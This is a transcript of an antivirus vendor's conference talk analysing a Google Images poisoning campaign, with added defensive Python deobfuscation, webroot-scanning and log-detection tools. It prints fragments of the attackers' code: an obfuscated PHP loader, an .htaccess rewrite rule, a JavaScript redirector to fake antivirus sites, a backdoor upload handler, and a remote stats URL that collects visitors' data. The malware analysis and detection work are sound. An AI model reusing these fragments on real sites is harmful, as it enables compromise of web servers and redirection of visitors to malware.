Poisoning Google images

There have long been links on the internet that take the unwary user to a page with unexpected or malicious content. Most of these attempts rely on the user clicking on the link to be successful. However, the latest variation has moved beyond simple text links to "Google-image poisoning": placing malware in the middle of Google searches for images, where users have traditionally had no reason to be wary. Our presentation will focus on how malware writers are able to infect the average website, with detailed analyses of the PHP script used to infect sites and of the SEO techniques used to get infected images to the top of search results.

  • Introduction
  • Mention: a successful attack (and why), and how it "works" (in general)
  • SEO – images are "well ranked"
  • How it works and who it is aimed at. At the beginning they did not "distinguish" between OSes or browsers
  • Black SEO
  • Trust phenomenon
  • Different behaviour -> hand over to the other speaker
  • Before dissecting the behaviour, mention HOW the "legitimate websites" got infected + add a "story"
  • Main PHP script + story – narration + only "list" the script's functions (do not dissect them)
  • Which parameters there are and what they are used for

Presentation Transcript

  • Analysis of Google Images Poisoning. Lukáš Hasík, Jan Širmer. AVAR 2011, www.avast.com
  • Agenda
    • What is Google-images poisoning?
    • How it works
    • Doorway generator
    • JavaScript redirector
    • Evolution
    • Data from the AVAST CommunityIQ userbase
    • Summary
    • Questions
  • Google Images poisoning
    • SEO blackhat poisoning attack
    • Uses hacked sites to redirect users to sites containing fake AV or exploits
    • Uses keyword-rich pages with hot-linked images for higher indexing by search bots
    • Images from hacked sites are near the top of the search results
    • Focused on users coming from well-known search engines
  • Google Images poisoning: how does it work? (diagram: User -> Infected server)
  • Google search results (screenshot)
  • Google Images poisoning (diagram: User -> Infected server -> Fake AV / Remote server)
  • Fake antiviruses (screenshot)
  • Google Images poisoning (diagram: User -> Infected server -> Fake AV / Remote server -> Bad guy)
  • Why is it so successful?
    • Great SEO, and nobody used SEO for "images"
  • Why is it so successful? (2)
    • Computer users do not expect that they can get infected when searching for images on legitimate sites (diagram: Infected server -> Fake AV server)
  • Why is it so successful? (3)
    • Hide and seek: if users are using the Opera browser or they are coming from Google, Yahoo or Bing, they are served a JavaScript redirector to the malicious content
  • Your website gets infected
    • The bad guys are using stolen FTP credentials
    • They upload a PHP script to the web server
    • This is used for uploading malicious content to the web server, creating spam pages, and uploading additional files to the web server
    • Bonus feature: it lets the owners know that the page is ready
  • Additional malicious files
    • xmlrpc.txt – stores the remote server address
    • -> xml.txt -> xml.cgi – the address in Base64
    • iog.txt – stores the redirecting JavaScript
    • shab100500.txt – stores the spam HTML template
    • -> don.txt – the HTML template in Base64
  • PHP script on infected sites
    • Earlier, they used names such as d{1,3}.php
    • Today, they use names like microphone.php, etc.
    • This script is responsible for:
      1. Creating spam pages for Google bot indexing
      2. Changing .htaccess
      3. Serving the redirect script that sends users to exploit sites
      4. Serving the redirect script that sends users to the fake AV
      5. Downloading malicious files to the server
      6. Telling the owners that the site is ready
  • PHP script: the original PHP file uploaded to the server
      <?eval(gzuncompress(base64_decode('eNqVWG2P4kYM/…/woBlZVjC9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I='))); ?>
  • PHP script: the file after the first step of deobfuscation (strings are split into fragments joined with PHP's '.' operator)
      $GLOBALS['_1600532410_'] = Array(base64_decode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n'), …
      function _1070120820($i) { $a = Array('c'.'Q='.'=', 'cQ==', …
      ($GLOBALS['_1600532410_'][16](_1070120820(6))) {…
  • PHP script after removing the obfuscation
      if (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) {}
      if (strpos($_SERVER['HTTP_REFERER'], 'google.') || strpos($_SERVER['HTTP_REFERER'], 'yahoo.') || strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) {
          $_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
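The two deobfuscation steps the slides walk through (peeling the eval(gzuncompress(base64_decode(...))) wrapper, then re-joining strings that were split with PHP's '.' operator before base64-decoding them) can be scripted for triage. The helper below is an added example written for this page, not code from the Avast presentation. It relies on Python's zlib reading the same zlib-format data that PHP's gzuncompress() consumes. The inner stage and the file wrapping it are constructed here; the split fragment is the one from the slide ('ZXJyb3Jfcm.Vwb3J0.aW5.n') with its quotes restored.

```python
import base64
import re
import zlib
from typing import Optional

# Stage 1 as uploaded: <?eval(gzuncompress(base64_decode('...'))); ?>
# PHP's gzuncompress() reads zlib-format data, which is what zlib.decompress() takes.
LAYER1_RE = re.compile(
    r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*['\"]?"
    r"([A-Za-z0-9+/=]+)['\"]?\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)
# Stage 2 hides every string as quoted fragments joined with PHP's '.' operator,
# e.g. 'ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n', so no contiguous base64 token is visible.
FRAGMENT_RE = re.compile(r"['\"]([A-Za-z0-9+/=]*)['\"]")


def is_layer1_obfuscated(php_source: str) -> bool:
    """Detection check: does the file carry the eval(gzuncompress(base64_decode())) wrapper?"""
    return LAYER1_RE.search(php_source) is not None


def extract_first_stage(php_source: str) -> Optional[str]:
    """Return the PHP code hidden inside the wrapper, or None if the wrapper is absent."""
    match = LAYER1_RE.search(php_source)
    if match is None:
        return None
    blob = base64.b64decode(match.group(1))
    return zlib.decompress(blob).decode("utf-8", errors="replace")


def decode_split_base64(expr: str) -> str:
    """Re-join the quoted fragments of a PHP concatenation and base64-decode the result."""
    joined = "".join(FRAGMENT_RE.findall(expr))
    return base64.b64decode(joined).decode("utf-8", errors="replace")


# Constructed sample: a harmless inner stage wrapped the way the slide shows.
SAMPLE_INNER = "<?php echo 'constructed inner stage'; ?>"
SAMPLE_FILE = "<?eval (gzuncompress (base64_decode('%s') ) ); ?>" % (
    base64.b64encode(zlib.compress(SAMPLE_INNER.encode())).decode()
)
# The fragment from the slide ('ZXJyb3Jfcm.Vwb3J0.aW5.n') with its quotes restored.
SAMPLE_SPLIT = "'ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n'"

if __name__ == "__main__":
    print(extract_first_stage(SAMPLE_FILE))
    print(decode_split_base64(SAMPLE_SPLIT))  # error_reporting
```

The second function shows why the split strings matter for detection: the slide's fragment re-joins to "ZXJyb3JfcmVwb3J0aW5n", which is the base64 form of error_reporting, the first entry of the script's function dispatch table. A signature that looks for a contiguous base64 token would miss it; re-joining before decoding does not.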
  • Doorway generator
    • The HTML template is stored in the file .log/SITE/shab100500.txt
    • In the new version, shab100500.txt was replaced by don.txt
      <HTML>
      Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in
      <Replaceme> </Replaceme>
      Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco
      </HTML>
  • Doorway generator
    • Get the descriptions of the top 40 "search keywords" from Google web
    • Shuffle the words in their descriptions to get unique text (example on the slide: "harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived")
  • Doorway generator
    • Get the top 20 "search keyword" results from Google Images and extract the links to the image files
    • Generate <img> tags and shuffle them:
      <img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">
  • Doorway generator (example output: the shuffled description text interleaved with the generated <img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)"> tags)
  • Doorway generator: the resulting page
      <HTML>
      Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in
      <h1>SEARCH KEYWORD</h1>
      Suggested links
      <Replaceme>Links to the 30 most recently generated links</Replaceme>
      Rich-word generated text with hot-linked images
      Links to alternative pages
      Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco
      </HTML>
  • How do they make image URLs less suspicious?
    • The PHP script writes this .htaccess rule, inserting its own path from $_SERVER['SCRIPT_NAME']:
      "RewriteEngine On
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule ^(.*)$ " . $_SERVER['SCRIPT_NAME'] . "?q=$1 [L]"
    • This changes the URL from the suspicious http://SITE/wp-admin/BAD.php?q=search-keywords to http://SITE/wp-admin/search-keywords
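A site owner who suspects this infection can check a copy of the webroot for the traces the slides describe: the artifact files kept under .log/, the eval(gzuncompress(base64_decode(...))) wrapper, the $GLOBALS['_N_'] dispatch table of the second stage, the old d{1,3}.php naming, and an .htaccess that funnels every non-existent path into a PHP script's ?q= parameter. The scanner below is an added example, not code from the presentation or from Avast. The tree it builds in a temporary directory is constructed for the demo; microphone.php, the .log/ file names and the wp-admin path come from the slides, while example-site, d12.php and the file contents are placeholders.

```python
import os
import re
import tempfile
from typing import List, Tuple

# Artifact file names from the talk; the backdoor keeps them under ".log/<site>/".
ARTIFACT_NAMES = {"xmlrpc.txt", "xml.txt", "xml.cgi", "iog.txt",
                  "shab100500.txt", "don.txt"}
# First-stage wrapper of the uploaded PHP script.
EVAL_WRAPPER = re.compile(r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(", re.I)
# Second stage: a $GLOBALS['_<digits>_'] dispatch table filled from base64_decode().
GLOBALS_TABLE = re.compile(
    r"\$GLOBALS\s*\[\s*['\"]?_\d+_['\"]?\s*\]\s*=\s*Array\s*\(\s*base64_decode", re.I)
# Older naming scheme of the script (d1.php ... d999.php).
SHORT_NAME = re.compile(r"^d\d{1,3}\.php$", re.I)

Finding = Tuple[str, str]  # (path relative to the webroot, reason)


def suspicious_htaccess(text: str) -> bool:
    """True when every non-existent path is rewritten into a PHP script's ?q= parameter."""
    has_not_file = re.search(r"RewriteCond\s+%\{REQUEST_FILENAME\}\s+!-f", text, re.I)
    has_not_dir = re.search(r"RewriteCond\s+%\{REQUEST_FILENAME\}\s+!-d", text, re.I)
    rule = re.search(r"RewriteRule\s+\^\(\.\*\)\$\s+\S+\.php\?q=\$1", text, re.I)
    return bool(has_not_file and has_not_dir and rule)


def scan_webroot(root: str) -> List[Finding]:
    """Walk a copy of the webroot and collect (relative path, reason) pairs."""
    findings: List[Finding] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        in_log_dir = ".log" in rel_dir.split(os.sep)
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if in_log_dir and name.lower() in ARTIFACT_NAMES:
                findings.append((rel, "known artifact file under .log/"))
            if SHORT_NAME.match(name):
                findings.append((rel, "short d{1,3}.php script name"))
            if not (name.lower().endswith(".php") or name == ".htaccess"):
                continue
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    data = fh.read()
            except OSError:
                continue
            if name == ".htaccess":
                if suspicious_htaccess(data):
                    findings.append((rel, ".htaccess rewrites missing paths into a PHP ?q= handler"))
            else:
                if EVAL_WRAPPER.search(data):
                    findings.append((rel, "eval(gzuncompress(base64_decode(...))) wrapper"))
                if GLOBALS_TABLE.search(data):
                    findings.append((rel, "$GLOBALS['_N_'] base64 dispatch table"))
    return sorted(findings)


# Constructed sample tree: one clean file plus the traces an infected site would carry.
# The base64 blobs are placeholders, not real payloads.
SAMPLE_TREE = {
    "index.php": "<?php echo 'clean site'; ?>",
    "wp-admin/microphone.php": "<?eval (gzuncompress (base64_decode('Tk9UQVBBWUxPQUQ=') ) ); ?>",
    "wp-admin/.htaccess": (
        "RewriteEngine On\n"
        "RewriteCond %{REQUEST_FILENAME} !-f\n"
        "RewriteCond %{REQUEST_FILENAME} !-d\n"
        "RewriteRule ^(.*)$ /wp-admin/microphone.php?q=$1 [L]\n"
    ),
    "wp-admin/.log/example-site/xmlrpc.txt": "http://remote.invalid/\n",
    "wp-admin/.log/example-site/don.txt": "PEhUTUw+",
    "images/d12.php": "<?php $GLOBALS['_1600532410_']=Array(base64_decode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n')); ?>",
}


def demo() -> List[Finding]:
    """Build the constructed tree in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_TREE.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_webroot(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Run it against an offline copy of the site (scan_webroot("/path/to/copy")) rather than the live document root, so that a hit does not trigger the script's own behaviour. The .htaccess check deliberately requires all three directives: the !-f and !-d conditions plus a ?q=$1 target are what turn arbitrary keyword paths under the directory into doorway pages, and a rewrite rule on its own is common in legitimate CMS installs.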
  • PHP script evolution
    • The first version was focused on all users using the Opera browser or users coming from Google, Yahoo or Bing
    • During June, we found some changes in the PHP code:
      - Google is the only target
      - New redirection system
    • The request goes to a remote server (mydiarycom.net) – centralized
    • They have statistical data from the parameters
    • No need to update iog.txt (the redirecting script) or make differentiating changes on each server
  • Data parameters: http://mydiarycom.net/out/stat.cgi?parameter=
    1. Name of the doorway site
    2. The full URL of the doorway script
    3. Visitor's IP
    4. The referring URL
    5. The User-Agent of the user's browser
    6. The search query used on Google
  • IP address and user-agents: Fake AV (screenshot)
  • IP address and user-agents: spam page (screenshot)
  • JavaScript redirector ("SITE contains FakeAV" stands for the fake-AV site's URL)
      var URL = "SITE contains FakeAV" + encodeURIComponent(document.referrer)
          + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" + encodeURIComponent(document.URL)
          + "&default_keyword=default";
      if (window != top) { top.location.href = URL; } else document.location = URL;
  • Redirection
    • Mac – http://IP/r/RANDOM_STRING; the IP and 'r' are changed every 30 minutes
    • Exploit site – http://SITE/index.php?tp=RANDOM_STRING; the site and 'tp' are changed every 30 minutes
    • Fake AV – http://SITE/fast-scan/
  • Other changes
    • Rotating user-agent string
    • Password-protected maintenance request (someone who knows how this algorithm works can easily change it and redirect to his or her own site)
    • xml.txt was replaced by xml.cgi
    • Working with free blog sites
  • Password-protected maintenance request
      if ($_GET['dom100500'] != '') {
          $_13 = fopen('.log/' . $_4 . '/xmlrpc.txt', 'w+');
          fwrite($_13, $_GET['dom100500']);
          fclose($_13);
      }
      if ($_GET['up100500'] != '') {
          $_14 = $_14 . basename($_FILES['uploaded']['name']);
          $_15 = round(0 + 0.5 + 0.5);
          if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $_14))
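The maintenance request above and the rewrite rule from the earlier slide both leave traces in the web server's access log: the operator's dom100500/up100500 requests, and keyword paths under the rewrite directory that answer 200 although no such file exists, fetched first by the crawler and then by search-engine visitors. The detector below is an added example, not code from the presentation or from Avast. It assumes the Apache/nginx "combined" log format and that the rewrite lives under /wp-admin/ as in the slide's URL example; the log lines are constructed (RFC 5737 documentation addresses, invented timestamps), and microphone.php is the script name quoted on the slides.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format (assumption: that is what the server writes).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Parameters of the password-protected maintenance request shown on the slide.
MAINTENANCE_PARAMS = {
    "dom100500": "rewrites .log/<site>/xmlrpc.txt with a new remote server address",
    "up100500": "uploads a file to the server",
}
# Referers the redirector keys on.
SEARCH_ENGINES = ("google.", "yahoo.", "bing.")
# Directory the rewrite rule lives in (assumption, taken from the slide's URL example).
DOORWAY_PREFIXES = ("/wp-admin/",)

Finding = Tuple[str, str, str]  # (client IP, path, reason)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields; None when it does not parse."""
    match = LOG_RE.match(line.strip())
    return match.groupdict() if match else None


def classify_visitor(record: Dict[str, str]) -> str:
    """Label who fetched the page: a search-engine visitor, a crawler, or anyone else."""
    if any(engine in record["referer"].lower() for engine in SEARCH_ENGINES):
        return "search-engine referer"
    if "bot" in record["ua"].lower():
        return "crawler"
    return "direct"


def detect(lines: List[str]) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue
        parts = urlsplit(record["target"])
        path, query = parts.path, parse_qs(parts.query)
        # 1. Maintenance/upload requests to the backdoor, whatever the script is called.
        for param, effect in MAINTENANCE_PARAMS.items():
            if param in query:
                findings.append((record["ip"], path,
                                 f"backdoor maintenance request ({param}: {effect})"))
        # 2. Extension-less "keyword" paths answered 200 under the rewrite directory:
        #    with the .htaccess rule in place these are doorway pages, not real files.
        for prefix in DOORWAY_PREFIXES:
            tail = path[len(prefix):] if path.startswith(prefix) else ""
            if tail and "." not in tail and "/" not in tail and record["status"] == "200":
                findings.append((record["ip"], path,
                                 f"keyword path served 200 under {prefix} ({classify_visitor(record)})"))
    return findings


# Constructed log lines (RFC 5737 documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jun/2011:10:01:02 +0000] "GET /wp-admin/microphone.php?dom100500=http://remote.invalid/ HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jun/2011:10:01:09 +0000] "POST /wp-admin/microphone.php?up100500=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jun/2011:10:05:44 +0000] "GET /wp-admin/cheap-holiday-photos HTTP/1.1" 200 5123 "http://www.google.com/imgres?q=cheap+holiday+photos" "Mozilla/5.0 (Windows NT 6.1) Firefox/4.0"',
    '192.0.2.50 - - [12/Jun/2011:10:06:00 +0000] "GET /wp-admin/cheap-holiday-photos HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '192.0.2.9 - - [12/Jun/2011:10:07:13 +0000] "GET /about/ HTTP/1.1" 200 3000 "http://www.google.com/search?q=site" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, reason in detect(SAMPLE_LOG):
        print(f"{ip} {path}: {reason}")
```

The first rule is the high-confidence one: nothing legitimate sends dom100500 or up100500, so a single hit identifies both the backdoor's file and the operator's address. The second rule is a heuristic and needs the prefix tuned to where the rewrite was found; the referer label is what ties a hit back to the cloaking logic, since the same path fetched by the crawler returns the spam page while a search-engine visitor gets the redirector.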
  • Data from the AVAST CommunityIQ
    • From March to August 2011, we discovered 22,580 unique infected sites
    • 5,698 sites are still infected
    • Typo in the injected tag: <IMG HEIGTH="1" WIDTH
  • Infected domains (chart)
  • Number of infected domains (chart)
  • Summary
    • Google-image poisoning is an easy way to spread fake AV and exploits
    • It's based on stolen FTP credentials of webmasters and great backdoor algorithms
    • The number of infected legitimate domains is growing every day
    • Common sense is not sufficient protection
  • Questions and Answers
  • Thank you. Jan Sirmer (sirmer@avast.com), Senior Virus Analyst; Lukas Hasik (hasik@avast.com), QA Director